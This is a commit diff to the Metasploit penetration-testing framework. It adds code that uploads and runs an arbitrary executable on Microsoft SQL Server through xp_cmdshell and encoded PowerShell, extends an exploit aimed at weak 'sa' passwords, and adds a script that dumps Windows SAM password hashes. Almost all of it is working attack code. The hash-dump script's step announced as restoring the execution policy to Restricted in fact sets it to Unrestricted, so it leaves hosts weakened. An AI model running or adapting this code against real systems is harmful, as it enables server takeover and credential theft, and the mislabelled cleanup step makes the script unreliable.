Merge in R3L1K's Powershell enhancements and powerdump code (hashdump through powershell)

git-svn-id: file:///home/svn/framework3/trunk@10721 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/exploit/mssql.rb

@@ -164,6 +164,37 @@ module Exploit::Remote::MSSQL
 	end
 
 
+	#
+	# Upload and execute a Windows binary through MSSQL queries and Powershell
+	#
+	def powershell_upload_exec(exe, debug=false)
+
+		# hex converter
+		hex = exe.unpack("H*")[0]
+		# create random alpha 8 character names
+		#var_bypass  = rand_text_alpha(8)
+		var_payload = rand_text_alpha(8)
+		print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
+		# our payload converter, grabs a hex file and converts it to binary for us through powershell
+		h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}.exe',$b)"
+		h2b_unicode=Rex::Text.to_unicode(h2b)
+		# base64 encode it, this allows us to perform execution through powershell without registry changes
+		h2b_encoded = Rex::Text.encode_base64(h2b_unicode)
+		print_status("Uploading the payload #{var_payload}, please be patient...")
+		idx = 0
+		cnt = 500
+		while(idx < hex.length - 1)
+			mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
+			idx += cnt
+		end
+		print_status("Converting the payload utilizing PowerShell EncodedCommand...")
+		mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug)
+		mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
+		print_status("Executing the payload...")
+		mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
+		print_status("Be sure to cleanup #{var_payload}.exe...")
+	end
+
 	#
 	# Send and receive using TDS
 	#

modules/exploits/windows/mssql/mssql_payload.rb

@@ -24,27 +24,21 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Microsoft SQL Server Payload Execution',
 			'Description'    => %q{
-					This module will execute an arbitrary payload on a Microsoft SQL
-				Server, using the Windows debug.com method for writing an executable to disk
-				and the xp_cmdshell stored procedure. File size restrictions are avoided by
-				incorporating the debug	bypass method presented at Defcon 17 by SecureState.
-				Note that this module will leave a metasploit payload in the Windows
-				System32 directory which must be manually deleted once the attack is completed.
+					This module will utilize multiple methods in payload delivery on a given system all through MSSQL. JDuck's method will utilize wscript in order to execute the initial stager. ReL1K's method will utilize either Windows Debug which is currently installed on anything pre Windows 7 and utilize binary to hex conversion methods. ReL1K's newest method can utilize powershell for the conversion methods and can only be used on Server 2008 and Windows 7 based systems or with other systems that have installed powershell.
 			},
 			'Author'         => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', 'jduck' ],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
-					# 'sa' password in logs
+                                        # 'sa' password in logs
 					[ 'CVE', '2000-0402' ],
 					[ 'OSVDB', '557' ],
 					[ 'BID', '1281' ],
-					# blank default 'sa' password
+                                        # blank default 'sa' password
 					[ 'CVE', '2000-1209' ],
 					[ 'OSVDB', '15757' ],
-					[ 'BID', '4797' ],
-					[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf' ]
+					[ 'BID', '4797' ]
 				],
 			'Platform'       => 'win',
 			'Targets'        =>
@@ -53,11 +47,13 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'May 30 2000'
-		))
+			))
 		register_options(
 			[
 				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
 				OptBool.new('UseCmdStager', [ false, "Wait for user input before returning from exploit", true ]),
+				OptBool.new('UseWinDebug',[ false, "Use Windows debug for payload conversion, 2k3 and below only", false]),
+				OptBool.new('UsePowerShell',[ false, "Use PowerShell for the payload conversion on Server 2008 and Windows 7", false]),
 			])
 	end
 
@@ -73,9 +69,22 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
+		if (not mssql_login_datastore)
+			print_status("Invalid SQL Server credentials")
+			return
+		end
+
+		# Use Windows debug method for payload delivery
+		if (datastore['UseWinDebug'])
+				mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded))
+
+		# Use powershell method for payload delivery
+		elsif (datastore['UsePowerShell'])
+			powershell_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded))
+
 		# Use the CmdStager or not?
-		if (not datastore['UseCmdStager'])
-			exe = generate_payload_exe
+		elsif (not datastore['UseCmdStager'])
+			exe = generate_exe
 			mssql_upload_exec(exe, datastore['VERBOSE'])
 		else
 			execute_cmdstager({ :linemax => 1500, :nodelete => true })

scripts/meterpreter/powerdump.rb

@@ -0,0 +1,63 @@
+# $Id$
+#
+# Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry
+# keys. This script requires you to be running as system in order to work properly. This has currently been
+# tested on Server 2008 and Windows 7, which install PowerShell by default.
+#
+# Script and code written by: Kathy Peters, Joshua Kelley (winfang), and David Kennedy (rel1k)
+#
+# Special thanks to Carlos Perez for the template from GetCounterMeasures.rb
+#
+# Script version 0.0.1
+#
+
+session = client
+@@exec_opts = Rex::Parser::Arguments.new(
+	"-h" => [ false, "Help menu." ],
+)
+
+def usage
+	print_line("PowerDump -- Dumping the SAM database through PowerShell")
+	print_line("Dump username and password hashes on systems that have")
+	print_line("PowerShell installed on the system. Win7 and 2008 tested.")
+	print(@@exec_opts.usage)
+	raise Rex::Script::Completed
+end
+
+#-------------------------------------------------------------------------------
+# Actual Hashdump here
+
+def dumphash(session)
+
+	path = File.join( Msf::Config.install_root, "data", "exploits", "powershell" )
+
+	print_status("Running PowerDump to extract Username and Password Hashes...")
+	filename=("#{rand(100000)}.ps1")
+	hash_dump=("#{rand(100000)}")
+	session.fs.file.upload_file("%TEMP%\\#{filename}","#{path}/powerdump.ps1")
+	print_status("Uploaded PowerDump as #{filename} to %TEMP%...")
+	opmode = ""
+	print_status("Setting ExecutionPolicy to Unrestricted...")
+	session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
+	print_status("Dumping the SAM database through PowerShell...")
+	session.sys.process.execute("powershell C:\\Windows\\Temp\\#{filename} >> C:\\Windows\\Temp\\#{hash_dump}", nil, {'Hidden' => 'true', 'Channelized' => true})
+	sleep(10)
+	hashes=session.fs.file.new("%TEMP%\\#{hash_dump}", "rb")
+	begin
+		while ((data = hashes.read) != nil)
+			data=data.strip
+			puts(data)
+		end
+	rescue EOFError
+	ensure
+		hashes.close
+	end 
+	print_status("Setting Execution policy back to Restricted...")
+	session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
+	print_status("Cleaning up after ourselves...")
+	session.sys.process.execute("cmd /c del %TEMP%\\#{filename}", nil, {'Hidden' => 'true', 'Channelized' => true})
+	session.sys.process.execute("cmd /c del %TEMP%\\#{hash_dump}", nil, {'Hidden' => 'true', 'Channelized' => true})
+
+end
+print_status("PowerDump v0.1 - PowerDump to extract Username and Password Hashes...")
+dumphash(session)